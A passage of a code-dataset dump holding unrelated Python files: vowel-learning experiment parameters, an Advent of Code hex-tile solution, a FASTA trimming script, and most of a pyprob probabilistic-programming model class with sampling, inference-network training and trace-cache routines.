0.001\n\t\n\t\t# Training & Testing\n\t\t\n\t\tself.n_samples = {\n\t\t\t'train' \t: \t9,\n\t\t\t'test'\t\t:\t1\n\t\t\t\t\t\t\t\t\t}\n\t\t# Use:\n\t\t# For example: self.n_samples['train'] is the amount of null or /a/ or /o/ samples for each speaker which are \n\t\t# used to train the ESN.\n\t\t\n\t\t# In order to evaluate the Quality of our ESN, we 'keep' some null, and vowel samples to plug into the ESN and\n\t\t# see if they are categorized correctly.. How many 'test' samples? > self.n_samples['test']\n\t\n\t\n\t\t# Speaker generalisation?\n\t\t# The ESN will be trained on all samples above that age and be tested on all samples up to that age.\n\t\t# Put False, if ESN should train on all speakers\n\t\tself.generalisation_age = 2\n\t\t\n\t\t\n\n\t\t# FLAGS\n\t\t# --------------------------------------------------------------------------------------------------------------\n\t\t#Use compressed DRNL output?\n\t\tself.compressed_output = True\n\t\t\n\t\t#Train with logistic regression instead of ridge regression?\n\t\tself.logistic = False\n\n\t\t# Inferred and static variables\n\t\tself.n_channels = 50\n\t\tself.flow = None\n\t\n\t\t# ===============================================================================================================\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\n\tdef get_learn_params(self):\n\t\t\"\"\"\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t# Parameters that are used in 'learn' (and functions)\n\t\t# ===============================================================================================================\n\t\t# ===============================================================================================================\n\t\t\"\"\"\n\t\t# Output-subfolder and verbosity: See __init__()\n\t\t\n\t\t# Learner, Targets; etc.\n\t\t\t# An integer (0 for instance) - Which of the speakers shall be the learner?\n\t\tself.learner = 0\n\t\t\t# From which group?\n\t\tself.sp_group_name = 'srangefm_2'\n\t\t\t#Target vowel for imitation (default: 'a') \"all\" = self.vowels\n\t\tself.targets = ['a','i','u']#\"all\"\n\t\t\t#Initial target (can change after 1 iteration, due to intrinsic motivation)\n\t\tself.target = \"a\"\n\t\t\t#vocal tract parameters to learn (other options: 'all' or 'flat')\n\t\t\t\t# Only the tongue (flat)?\n\t\t#self.pars_to_learn = ['TCX','TTX','TTY','TBX','TBY']\n\t\t\t\t# All except lips and tongue side elevations, jaw\n\t\tself.pars_to_learn = ['TCX','TTX','TTY','TBX','TBY','HX','HY','VS'] # left out: ,'JA','LD','LP' (jaw and lip parameters)\n\t\t\t\t# All. Be careful not to omit the brackets!\n\t\t#self.pars_to_learn = [\"all\"]\n\t\t\t#simulate flat tongue, i.e. set all TS to 0 again and again? This only kicks into action, if you're not learning the tongue side elevations too.\n\t\tself.flat_tongue = False\n\t\t\n\t\t\t\t# The ESN we're using:\n\t\t# --------------------------------------------------------------\n\t\t# Important. If the sequence of nodes in the ESN used here does not correspond to how ambient speech was produced, you will have to perform the ambient\n\t\t# speech setup again before executing learn. \n\t\t# \t\t(For example: ambient speech of 5 vowels is produced. But now we decide to use an ESN trained on only 3 vowels,\n\t\t# \t\t- 'learn' will be confused, because it assumes the amount of vowels initialized in 'ambient speech setup' as also being the number of ESN output nodes.\n\t\t# \t\tSolution: reinitialize with only 3 vowels (in ambient speech).\n\t\t#self.ESN_path = '/data/output/hear/'+self.sp_group_name+'/worker_0reservoir1000_leakyTrue.flow'\n\t\tself.ESN_path = '/data/output/hear/'+self.sp_group_name+'/3vow_N1000_reg.flow' # Max Murakami's thesis ESN.\n\t\t#self.ESN_path = raw_input(\"Please Enter the (relative) path to the reservoir (ESN) which is to be used in the babbling stage!:\\n\\t>\")\n\t\t\n\t\t\t# Special ESN sequence of nodes? If not set False\n\t\tself.ESN_sequence = ['a','i','u','null'] # For the orig. ESNs (Murakami)\n\t\t#self.ESN_sequence = False\n\t\t\n\t\t\n\t\t# Sampling.\n\t\t# --------------------------------------------------------------\n\t\t\t#resample invalid motor parameters?\n\t\t\t# Chose one of the three options. 'Normal' simply resamples all parameters if one is below/above boundary (slow!), 'penalty' simply sets\n\t\t\t# the relative parameters to 0 or 1 if above 1 or below 0, and introduces a penalty to the fitness (to the reward). 'specific' only resamples\n\t\t\t# those parameters that went wrong, and keeps the others, also introducing a penalty. This is maybe the most complicated, but should be fast.\n\t\t\t# See 'learn functions' - if self.resample['normal']: etc for more details.\n\t\tself.resample = 'soft_edge'#{'normal':False, 'penalty':False, 'specific':True}\n\n\t\t\n\n\t\t\n\t\t\n\t\t# Always save the most advanced speech sound of each cathegory as a sound file in data?\n\t\t# If you do this, you won't need to set a realistic convergence threshold. It will simply learn and learn, until the user\n\t\t# interrupts. You can always check what the best learnt vowels are in data/output/learn/[speaker group]/peak/..\n\t\tself.save_peak = True\n\t\t\n\t\t# Reward computation and sigma\n\t\t# --------------------------------------------------------------\n\t\t\t#step-size = sigma (default=0.4) in the beginning.\n\t\tself.start_sigma = 0.4\n\t\t\t#keep sigma 0 constant? Of course, sigma will still change, according to the change of fitness. But 'current_sigma' in the code is a value, that the (constantly\n\t\t\t# changing) sigma will always go back to. (Go through 'learn_functions' looking for current_sigma and sigma, to see how they interact.\n\t\tself.keep_sigma_constant = False\n\t\t\t#alpha for constraint penalty (How badly should step-over-boundaries in the parameters be punished?)\n\t\tself.alpha = 0.4#1.\n\t\t\t#energy balance factor. non-efficient motor configurations (e.g. extreme tongue positions) are punished when computing reward.\n\t\tself.energy_factor = 0#0.1\n\t\t\t#restart search after bad solution from random learnt/nonlearnt parameters (see code)?\n\t\tself.random_restart = True\n\t\t\t# Reward is not enough. We must converge, in order to finish. Turn this on?\n\t\tself.must_converge = True\n\t\t\t# Is the learner motivated by random success in producing something \n\t\t\t# like any vowel and then steering towards that one (intrinsic_motivation)\n\t\t\t#, or do we have a specific target to learn?\n\t\t\t# Intrinsic motivation only makes sense, if you're learning most parameters. That way, \n\t\t\t# the not-learnt parameters (which are always kept static) will not interfere, when\n\t\t\t# we jump from one target to the next.\n\t\tself.intrinsic_motivation = True\n\t\t\n\t\t# Convergence Criteria.\n\t\t# --------------------------------------------------------------\n\t\t# threshold for convergence (reward threshold) - The confidence returned from the ESN. (originally 0.5 for all vowels)\n\t\tself.convergence_thresholds = {'a':0.5,'e':0.5,'i':0.5,'o':0.5,'u':0.5}\n\t\t\t#maximal conditioning number. (Covariance matrix)\n\t\tself.conditioning_maximum = 1e14\n\t\t\t# Parameter or Reward convergence range. This is the size of the parameter/reward window in which, if the last few generations stayed, the program will conclude,\n\t\t\t# that we have converged (found a local minimum in the fitness landscape) and reset (see random_restart) and correct sigma (make bigger)\n\t\tself.range_for_convergence = 0.15\n\t\t\t# The convergence interval is the number of datapoints which are checked if they converge in reward or parameters. This value is computed in the algorithm itself, \n\t\t\t# however, the user can set the interval here. (If automatic, simply put False).\n\t\t\t# Must be above the size of one generation!\n\t\tself.user_convergence_interval = 7\n\t\t\t# Optional. (If you want to use the recommended amount of samples for each iteration, simply put False.) \n\t\t\t# If you set population size, convergence interval also must be set.\n\t\tself.population_size = 20\n\t\t\n\n\n\n\n\t\t\"\"\"\n\t\tEven this simple example may take a very long time to finish, or it may\n\t\tnever stop.\n\t\tThe most critical factor for this is the quality of the auditory learning.\n\t\tSo your most important task is to make sure the auditory system is trained\n\t\tproperly:\n\t\t- Make sure that every single ambient speech sample is placed in the\n\t\t correct folder. If it sounds like [a] for you, put it in data/a and\n\t\t so on. If it doesn't sound like any of the target vowels, put it into\n\t\t one of the null folders. All null folders are treated in the same way,\n\t\t so it doesn't exactly make a big difference where you put it. \n\t\t The idea behind the different null folders is this: If we generate \n\t\t speech samples in the vicinity of a given prototypical vowel, then \n\t\t null samples may show up that don't really sound like that vowel but \n\t\t show some similarity to it. So in a sense, they represent constraints \n\t\t of the acoustical properties of that vowel, which greatly helps the \n\t\t auditory system to learn a model of that vowel.\n\t\t In the ideal case, all null folders contain the same number of samples,\n\t\t which should be a third of what each vowel folder holds. The reason\n\t\t is that we'd like to train the auditory system in an unbiased fashion\n\t\t such that the trained auditory system shows no a priori classification\n\t\t preference for any class. Use these rules to achieve this:\n\t\t n_samples is a multiple of the number of vowels,\n\t\t n_training is a multiple of the number of vowels,\n\t\t each vowel folder contains at least n_samples samples,\n\t\t each null folder contains at least n_samples/3 samples.\n\t\t An alternative is to bias auditory learning in favor of the null class.\n\t\t This will have the effect that the trained auditory system is more\n\t\t likely to classify a given sample as a null sample, so the speech\n\t\t sample needs to provide stronger evidence that it is one the target\n\t\t vowels. So introducing such a training bias creates \"stricter\" auditory\n\t\t systems, which is viable.\n\t\t- Increase the number of ambient speech samples for auditory learning. The\n\t\t number of samples that we generated in this example is way too small for\n\t\t efficient learning. Raise that number by at least one order of magnitude\n\t\t to see reasonable learning progress.\n\t\tOther ways to improve/accelerate learning:\n\t\t- Make use of parallelization. Especially when you're moving to problems that\n\t\t involve more than one articulator, being able to crank out tens or hundreds\n\t\t of speech samples per babbling iteration is a huge advantage and makes\n\t\t these problems feasible in the first place.\n\t\t- Run statistics. Because the reservoir of the auditory system is based on\n\t\t random numbers, you can always end up with one that has trouble recognizing\n\t\t one or the other vowel, even if your training parameters are good. Train\n\t\t multiple auditory systems and pick one that performs well.\n\t\t- Lower the reward threshold during babbling. Setting the reward threshold \n\t\t to 0.5 is rather ad hoc. If you find that speech samples with 0.47 are\n\t\t consistently good enough imitations, don't hesitate to lower that threshold.\n\t\t This will make speech evaluation more lenient and the whole imitation\n\t\t process much faster.\n\t \t\"\"\"\t\n\t\t \t\n\t\t \t\n\t\t\n \n","sub_path":"control/get_params.py","file_name":"get_params.py","file_ext":"py","file_size_in_byte":21608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"49660738","text":"from day24input import *\ninputrows = inputString.split(\"\\n\")\n\ndef getNextTile(tile, data):\n if data[0] == \"e\":\n tile = (tile[0]+2, tile[1])\n data = data[1:]\n elif data[0] == \"s\" and data[1] == \"e\":\n tile = (tile[0]+1, tile[1]+1)\n data = data[2:]\n elif data[0] == \"s\" and data[1] == \"w\":\n tile = (tile[0]-1, tile[1]+1)\n data = data[2:]\n elif data[0] == \"w\":\n tile = (tile[0]-2, tile[1])\n data = data[1:]\n elif data[0] == \"n\" and data[1] == \"w\":\n tile = (tile[0]-1, tile[1]-1)\n data = data[2:]\n elif data[0] == \"n\" and data[1] == \"e\":\n tile = (tile[0]+1, tile[1]-1)\n data = data[2:]\n return [tile, data]\n\ndef part1():\n state = {}\n for inputrow in inputrows:\n row = list(inputrow)\n tile = (0,0)\n while len(row) != 0:\n result = getNextTile(tile, row)\n tile = result[0]\n row = result[1]\n if tile not in state:\n state[tile] = \"Black\"\n else:\n state[tile] = \"Black\" if state[tile] == \"White\" else \"White\"\n\n count = 0\n for color in state.values():\n if color == \"Black\":\n count += 1\n return [state, count]\n\nresult = part1()\ncount = result[1]\nprint(count)\n\n#Part2\n\n#Keeping only black tiles to avoid extending state\nblackTiles = set()\nstate = result[0]\nfor tile, value in state.items():\n if value == \"Black\":\n blackTiles.add(tile)\n\ndef getNeighbours(tile):\n Etile = (tile[0]+2, tile[1])\n SEtile = (tile[0]+1, tile[1]+1)\n SWtile = (tile[0]-1, tile[1]+1)\n Wtile = (tile[0]-2, tile[1])\n NWtile = (tile[0]-1, tile[1]-1)\n NEtile = (tile[0]+1, tile[1]-1)\n return [Etile, SEtile, SWtile, Wtile, NWtile, NEtile]\n\n#One day iteration\ndef run(blackTiles):\n nrOfNeighbours = {} #key = tile, value = number of current neighboors of the tile\n\n for tile in blackTiles: #Initiate black tiles\n nrOfNeighbours[tile] = 0\n\n #The only relevant tiles are the black ones and their neighbours\n for tile in blackTiles:\n neighboors = getNeighbours(tile)\n for neighboor in neighboors:\n if neighboor not in nrOfNeighbours.keys():\n nrOfNeighbours[neighboor] = 1 #(neighbour of current tile)\n else:\n nrOfNeighbours[neighboor] += 1\n\n newBlackTiles = set()\n for tile, nr in nrOfNeighbours.items():\n if tile in blackTiles and nr == 1 or nr == 2:\n newBlackTiles.add(tile) #Stay Black\n elif tile not in blackTiles and nr== 2: \n newBlackTiles.add(tile) #Become black\n\n return newBlackTiles\n\nfor _ in range(0,100):\n blackTiles = run(blackTiles)\n\nprint(len(blackTiles))\n","sub_path":"day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309534492","text":"import sys\nfrom Bio import SeqIO\n\nseq_file = sys.argv[1]\ntit_file = open( sys.argv[2] , 'r' )\noutput_file = open( sys.argv[3] , 'w' )\nseq_gen = SeqIO.parse(seq_file, 'fasta')\n\nseq = seq_gen.__next__()\nfor tit in tit_file.readlines():\n while seq.id not in tit:\n try:\n seq = seq_gen.__next__()\n except:\n print(tit)\n sys.exit(0)\n\n frame_shift = int(tit[tit.find('F')+1:tit.find('F')+2])\n start_loc = int(tit[tit.find('L')+1:tit.find('R')])\n end_loc = int(tit[tit.find('R')+1:-1])\n fna_seq = str(seq.seq)[frame_shift + start_loc * 3 : frame_shift + end_loc * 3]\n\n output_file.writelines(tit)\n line_Number = int(len(fna_seq) / 60)\n for line in range(line_Number):\n output_file.writelines(fna_seq[line * 60:line * 60 + 60]+'\\n')\n output_file.writelines(fna_seq[line_Number*60:]+'\\n')\n\n \n\n \n","sub_path":"Trim_fna.py","file_name":"Trim_fna.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"79544130","text":"import torch\nimport torch.nn as nn\nimport time\nimport sys\nimport os\nimport uuid\nfrom threading import Thread\nfrom termcolor import colored\nimport math\nimport random\nimport tarfile\nimport tempfile\nimport shutil\n\nfrom .distributions import Empirical\nfrom . import state, util, __version__, TraceMode, InferenceEngine, InferenceNetwork, PriorInflation, Optimizer, TrainingObservation\nfrom .nn import ObserveEmbedding, SampleEmbedding, Batch, InferenceNetworkSimple, InferenceNetworkLSTM\nfrom .remote import ModelServer\nfrom .analytics import save_report\n\n\nclass Model(nn.Module):\n def __init__(self, name='Unnamed pyprob model'):\n super().__init__()\n self.name = name\n self._inference_network = None\n self._trace_cache_path = None\n self._trace_cache = []\n self._trace_cache_discarded_file_names = []\n\n def forward(self):\n raise NotImplementedError()\n\n def _trace_generator(self, trace_mode=TraceMode.PRIOR, prior_inflation=PriorInflation.DISABLED, inference_engine=InferenceEngine.IMPORTANCE_SAMPLING, inference_network=None, metropolis_hastings_trace=None, observation_importance_exponent=1., *args, **kwargs):\n while True:\n if inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK:\n self._inference_network.new_trace(util.pack_observes_to_variable(kwargs['observation']).unsqueeze(0))\n state.begin_trace(self.forward, trace_mode, prior_inflation, inference_engine, inference_network, metropolis_hastings_trace, observation_importance_exponent)\n result = self.forward(*args, **kwargs)\n trace = state.end_trace(result)\n yield trace\n\n def _trace_result_generator(self, prior_inflation=PriorInflation.DISABLED, observation_importance_exponent=1., *args, **kwargs):\n while True:\n state.begin_trace(None, trace_mode=TraceMode.NONE, prior_inflation=prior_inflation, observation_importance_exponent=observation_importance_exponent)\n result = self.forward(*args, **kwargs)\n state.end_trace(None)\n yield result\n\n def _traces(self, num_traces=10, trace_mode=TraceMode.PRIOR, prior_inflation=PriorInflation.DISABLED, inference_engine=InferenceEngine.IMPORTANCE_SAMPLING, inference_network=None, map_func=None, observation_importance_exponent=1., *args, **kwargs):\n generator = self._trace_generator(trace_mode=trace_mode, prior_inflation=prior_inflation, inference_engine=inference_engine, inference_network=inference_network, observation_importance_exponent=observation_importance_exponent, *args, **kwargs)\n ret = []\n time_start = time.time()\n if ((trace_mode != TraceMode.PRIOR) and (util.verbosity > 1)) or (util.verbosity > 2):\n len_str_num_traces = len(str(num_traces))\n print('Time spent | Time remain.| Progress | {} | Traces/sec'.format('Trace'.ljust(len_str_num_traces * 2 + 1)))\n prev_duration = 0\n for i in range(num_traces):\n if ((trace_mode != TraceMode.PRIOR) and (util.verbosity > 1)) or (util.verbosity > 2):\n duration = time.time() - time_start\n if (duration - prev_duration > util._print_refresh_rate) or (i == num_traces - 1):\n prev_duration = duration\n traces_per_second = (i + 1) / duration\n print('{} | {} | {} | {}/{} | {:,.2f} '.format(util.days_hours_mins_secs_str(duration), util.days_hours_mins_secs_str((num_traces - i) / traces_per_second), util.progress_bar(i+1, num_traces), str(i+1).rjust(len_str_num_traces), num_traces, traces_per_second), end='\\r')\n sys.stdout.flush()\n trace = next(generator)\n if map_func is not None:\n ret.append(map_func(trace))\n else:\n ret.append(trace)\n if ((trace_mode != TraceMode.PRIOR) and (util.verbosity > 1)) or (util.verbosity > 2):\n print()\n return ret\n\n def prior_sample(self, prior_inflation=PriorInflation.DISABLED, *args, **kwargs):\n generator = self._trace_result_generator(prior_inflation, *args, **kwargs)\n return next(generator)\n\n def prior_distribution(self, num_traces=1000, prior_inflation=PriorInflation.DISABLED, *args, **kwargs):\n generator = self._trace_result_generator(prior_inflation, *args, **kwargs)\n ret = []\n time_start = time.time()\n if util.verbosity > 1:\n len_str_num_traces = len(str(num_traces))\n print('Time spent | Time remain.| Progress | {} | Traces/sec'.format('Trace'.ljust(len_str_num_traces * 2 + 1)))\n prev_duration = 0\n for i in range(num_traces):\n if util.verbosity > 1:\n duration = time.time() - time_start\n if (duration - prev_duration > util._print_refresh_rate) or (i == num_traces - 1):\n prev_duration = duration\n traces_per_second = (i + 1) / duration\n print('{} | {} | {} | {}/{} | {:,.2f} '.format(util.days_hours_mins_secs_str(duration), util.days_hours_mins_secs_str((num_traces - i) / traces_per_second), util.progress_bar(i+1, num_traces), str(i+1).rjust(len_str_num_traces), num_traces, traces_per_second), end='\\r')\n sys.stdout.flush()\n ret.append(next(generator))\n if util.verbosity > 1:\n print()\n return Empirical(ret, name='Prior, num_traces={:,}'.format(num_traces))\n\n def posterior_distribution(self, *args, **kwargs):\n return self.posterior_traces(*args, **kwargs).map(lambda x: x.result)\n\n def posterior_traces(self, num_traces=1000, inference_engine=InferenceEngine.IMPORTANCE_SAMPLING, burn_in=None, initial_trace=None, observation_importance_exponent=1., *args, **kwargs):\n if (inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK) and (self._inference_network is None):\n raise RuntimeError('Cannot run inference with inference network because there is none available. Use learn_inference_network first.')\n if burn_in is not None:\n if burn_in >= num_traces:\n raise ValueError('burn_in must be less than num_traces')\n else:\n # Default burn_in\n burn_in = int(min(num_traces / 10, 1000))\n\n if inference_engine == InferenceEngine.IMPORTANCE_SAMPLING:\n traces = self._traces(num_traces=num_traces, trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, inference_network=None, observation_importance_exponent=observation_importance_exponent, *args, **kwargs)\n log_weights = [trace.log_importance_weight for trace in traces]\n name = 'Posterior, importance sampling (with proposal = prior), num_traces={:,}'.format(num_traces)\n elif inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK:\n self._inference_network.eval()\n traces = self._traces(num_traces=num_traces, trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, inference_network=self._inference_network, observation_importance_exponent=observation_importance_exponent, *args, **kwargs)\n log_weights = [trace.log_importance_weight for trace in traces]\n name = 'Posterior, importance sampling (with learned proposal, training_traces={:,}), num_traces={:,}'.format(self._inference_network._total_train_traces, num_traces)\n else: # inference_engine == InferenceEngine.LIGHTWEIGHT_METROPOLIS_HASTINGS or inference_engine == InferenceEngine.RANDOM_WALK_METROPOLIS_HASTINGS\n traces = []\n if initial_trace is None:\n current_trace = next(self._trace_generator(trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, observation_importance_exponent=observation_importance_exponent, *args, **kwargs))\n else:\n current_trace = initial_trace\n\n time_start = time.time()\n traces_accepted = 0\n samples_reused = 0\n samples_all = 0\n if util.verbosity > 1:\n len_str_num_traces = len(str(num_traces))\n print('Time spent | Time remain.| Progress | {} | Accepted|Smp reuse| Traces/sec'.format('Trace'.ljust(len_str_num_traces * 2 + 1)))\n prev_duration = 0\n for i in range(num_traces):\n if util.verbosity > 1:\n duration = time.time() - time_start\n if (duration - prev_duration > util._print_refresh_rate) or (i == num_traces - 1):\n prev_duration = duration\n traces_per_second = (i + 1) / duration\n print('{} | {} | {} | {}/{} | {} | {} | {:,.2f} '.format(util.days_hours_mins_secs_str(duration), util.days_hours_mins_secs_str((num_traces - i) / traces_per_second), util.progress_bar(i+1, num_traces), str(i+1).rjust(len_str_num_traces), num_traces, '{:,.2f}%'.format(100 * (traces_accepted / (i + 1))).rjust(7), '{:,.2f}%'.format(100 * samples_reused / max(1, samples_all)).rjust(7), traces_per_second), end='\\r')\n sys.stdout.flush()\n candidate_trace = next(self._trace_generator(trace_mode=TraceMode.POSTERIOR, inference_engine=inference_engine, metropolis_hastings_trace=current_trace, observation_importance_exponent=observation_importance_exponent, *args, **kwargs))\n log_acceptance_ratio = math.log(current_trace.length) - math.log(candidate_trace.length) + candidate_trace.log_prob_observed - current_trace.log_prob_observed\n for sample in candidate_trace.samples:\n if sample.reused:\n log_acceptance_ratio += util.safe_torch_sum(sample.log_prob)\n log_acceptance_ratio -= util.safe_torch_sum(current_trace._samples_all_dict_address[sample.address].log_prob)\n samples_reused += 1\n samples_all += candidate_trace.length\n\n if state._metropolis_hastings_site_transition_log_prob is None:\n print(colored('Warning: trace did not hit the Metropolis Hastings site, ensure that the model is deterministic except pyprob.sample calls', 'red', attrs=['bold']))\n else:\n log_acceptance_ratio += util.safe_torch_sum(state._metropolis_hastings_site_transition_log_prob)\n\n # print(log_acceptance_ratio)\n if math.log(random.random()) < float(log_acceptance_ratio):\n traces_accepted += 1\n current_trace = candidate_trace\n traces.append(current_trace)\n if util.verbosity > 1:\n print()\n if burn_in is not None:\n traces = traces[burn_in:]\n log_weights = None\n name = 'Posterior, {} Metropolis Hastings, num_traces={:,}, burn_in={:,}, accepted={:,.2f}%, sample_reuse={:,.2f}%'.format('lightweight' if inference_engine == InferenceEngine.LIGHTWEIGHT_METROPOLIS_HASTINGS else 'random-walk', num_traces, burn_in, 100 * (traces_accepted / num_traces), 100 * samples_reused / samples_all)\n\n # if inference_engine == InferenceEngine.IMPORTANCE_SAMPLING or inference_engine == InferenceEngine.IMPORTANCE_SAMPLING_WITH_INFERENCE_NETWORK:\n # ret.name += ' (effective sample size: {:,.2f})'.format(float(ret.effective_sample_size))\n return Empirical(traces, log_weights, name=name)\n\n def learn_inference_network(self, inference_network=InferenceNetwork.LSTM, training_observation=TrainingObservation.OBSERVE_DIST_SAMPLE, prior_inflation=PriorInflation.DISABLED, observe_embedding=ObserveEmbedding.FULLY_CONNECTED, observe_reshape=None, observe_embedding_dim=128, sample_embedding=SampleEmbedding.FULLY_CONNECTED, lstm_dim=128, lstm_depth=2, sample_embedding_dim=16, address_embedding_dim=128, batch_size=64, valid_size=256, valid_interval=2048, optimizer_type=Optimizer.ADAM, learning_rate=0.0001, momentum=0.9, weight_decay=1e-5, num_traces=-1, use_trace_cache=False, auto_save=False, auto_save_file_name='pyprob_inference_network', *args, **kwargs):\n if use_trace_cache and self._trace_cache_path is None:\n print('Warning: There is no trace cache assigned, training with online trace generation.')\n use_trace_cache = False\n\n if use_trace_cache:\n print('Using trace cache to train...')\n\n def new_batch_func(size=batch_size, discard_source=False):\n if discard_source:\n self._trace_cache = []\n\n while len(self._trace_cache) < size:\n current_files = self._trace_cache_current_files()\n if len(current_files) == 0:\n cache_is_empty = True\n cache_was_empty = False\n while cache_is_empty:\n current_files = self._trace_cache_current_files()\n num_files = len(current_files)\n if num_files > 0:\n cache_is_empty = False\n if cache_was_empty:\n print('Resuming, new data appeared in trace cache (currently with {} files) at {}'.format(num_files, self._trace_cache_path))\n else:\n if not cache_was_empty:\n print('Waiting for new data, empty (or fully discarded) trace cache at {}'.format(self._trace_cache_path))\n cache_was_empty = True\n time.sleep(0.5)\n\n current_file = random.choice(current_files)\n if discard_source:\n self._trace_cache_discarded_file_names.append(current_file)\n new_traces = self._load_traces(current_file)\n if len(new_traces) == 0: # When empty or corrupt file is read\n self._trace_cache_discarded_file_names.append(current_file)\n else:\n random.shuffle(new_traces)\n self._trace_cache += new_traces\n\n traces = self._trace_cache[0:size]\n self._trace_cache[0:size] = []\n return Batch(traces)\n else:\n def new_batch_func(size=batch_size, discard_source=False):\n traces = self._traces(size, trace_mode=TraceMode.PRIOR, prior_inflation=prior_inflation, *args, **kwargs)\n return Batch(traces)\n\n if self._inference_network is None:\n print('Creating new inference network...')\n valid_batch = new_batch_func(valid_size, discard_source=True)\n if inference_network == InferenceNetwork.SIMPLE:\n self._inference_network = InferenceNetworkSimple(model_name=self.name, observe_embedding=observe_embedding, observe_reshape=observe_reshape, observe_embedding_dim=observe_embedding_dim, valid_batch=valid_batch)\n else: # inference_network == InferenceNetwork.LSTM:\n self._inference_network = InferenceNetworkLSTM(model_name=self.name, lstm_dim=lstm_dim, lstm_depth=lstm_depth, observe_embedding=observe_embedding, observe_reshape=observe_reshape, observe_embedding_dim=observe_embedding_dim, sample_embedding=sample_embedding, sample_embedding_dim=sample_embedding_dim, address_embedding_dim=address_embedding_dim, valid_batch=valid_batch)\n\n self._inference_network.polymorph()\n else:\n print('Continuing to train existing inference network...')\n\n self._inference_network.train()\n self._inference_network.optimize(new_batch_func, training_observation, optimizer_type, num_traces, learning_rate, momentum, weight_decay, valid_interval, auto_save, auto_save_file_name)\n\n def save_inference_network(self, file_name):\n if self._inference_network is None:\n raise RuntimeError('The model has no trained inference network.')\n self._inference_network._save(file_name)\n\n def load_inference_network(self, file_name):\n self._inference_network = InferenceNetworkSimple._load(file_name, util._cuda_enabled, util._cuda_device)\n\n def trace_length_mean(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.mean\n\n def trace_length_stddev(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.stddev\n\n def trace_length_min(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.min\n\n def trace_length_max(self, num_traces=1000, *args, **kwargs):\n trace_lengths = self._traces(num_traces, trace_mode=TraceMode.PRIOR, map_func=lambda trace: trace.length, *args, **kwargs)\n trace_length_dist = Empirical(trace_lengths)\n return trace_length_dist.max\n\n def save_trace_cache(self, trace_cache_path, files=16, traces_per_file=512, prior_inflation=PriorInflation.DISABLED, *args, **kwargs):\n f = 0\n done = False\n while not done:\n traces = self._traces(traces_per_file, trace_mode=TraceMode.PRIOR, prior_inflation=prior_inflation, *args, **kwargs)\n file_name = os.path.join(trace_cache_path, 'pyprob_traces_{}_{}'.format(traces_per_file, str(uuid.uuid4())))\n self._save_traces(traces, file_name)\n f += 1\n if (files != -1) and (f >= files):\n done = True\n\n def use_trace_cache(self, trace_cache_path):\n self._trace_cache_path = trace_cache_path\n num_files = len(self._trace_cache_current_files())\n print('Monitoring trace cache (currently with {} files) at {}'.format(num_files, trace_cache_path))\n\n def _trace_cache_current_files(self):\n files = [name for name in os.listdir(self._trace_cache_path)]\n files = list(map(lambda f: os.path.join(self._trace_cache_path, f), files))\n for discarded_file_name in self._trace_cache_discarded_file_names:\n if discarded_file_name in files:\n files.remove(discarded_file_name)\n return files\n\n def _save_traces(self, traces, file_name):\n data = {}\n data['traces'] = traces\n data['length'] = len(traces)\n data['model_name'] = self.name\n data['pyprob_version'] = __version__\n data['torch_version'] = torch.__version__\n\n def thread_save():\n tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))\n tmp_file_name = os.path.join(tmp_dir, 'pyprob_traces')\n torch.save(data, tmp_file_name)\n tar = tarfile.open(file_name, 'w:gz', compresslevel=2)\n tar.add(tmp_file_name, arcname='pyprob_traces')\n tar.close()\n shutil.rmtree(tmp_dir)\n t = Thread(target=thread_save)\n t.start()\n t.join()\n\n def _load_traces(self, file_name):\n try:\n tar = tarfile.open(file_name, 'r:gz')\n tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))\n tmp_file = os.path.join(tmp_dir, 'pyprob_traces')\n tar.extract('pyprob_traces', tmp_dir)\n tar.close()\n if util._cuda_enabled:\n data = torch.load(tmp_file)\n else:\n data = torch.load(tmp_file, map_location=lambda storage, loc: storage)\n shutil.rmtree(tmp_dir)\n except:\n print('Warning: cannot load traces from file, file potentially corrupt: {}'.format(file_name))\n return []\n\n # print('Loading trace cache of length {}'.format(data['length']))\n if data['model_name'] != self.name:\n print(colored('Warning: different model names (loaded traces: {}, current model: {})'.format(data['model_name'], self.name), 'red', attrs=['bold']))\n if data['pyprob_version'] != __version__:\n print(colored('Warning: different pyprob versions (loaded traces: {}, current system: {})'.format(data['pyprob_version'], __version__), 'red', attrs=['bold']))\n if data['torch_version'] != torch.__version__:\n print(colored('Warning: different PyTorch versions (loaded traces: {}, current system: {})'.format(data['torch_version'], torch.__version__), 'red', attrs=['bold']))\n\n traces = data['traces']\n if util._cuda_enabled:\n for trace in traces:\n trace.cuda()\n return data['traces']\n\n def save_analytics(self, file_name, detailed_traces=2):\n if self._inference_network is None:\n raise RuntimeError('Analytics is currently available only with a trained inference network. Use learn_inference_network first.')\n save_report(self, file_name, detailed_traces=detailed_traces)\n\n\nclass ModelRemote(Model):\n def __init__(self, server_address='tcp://127.0.0.1:5555'):\n self._server_address = server_address\n self._model_server = ModelServer(server_address)\n super().__init__('{} running on 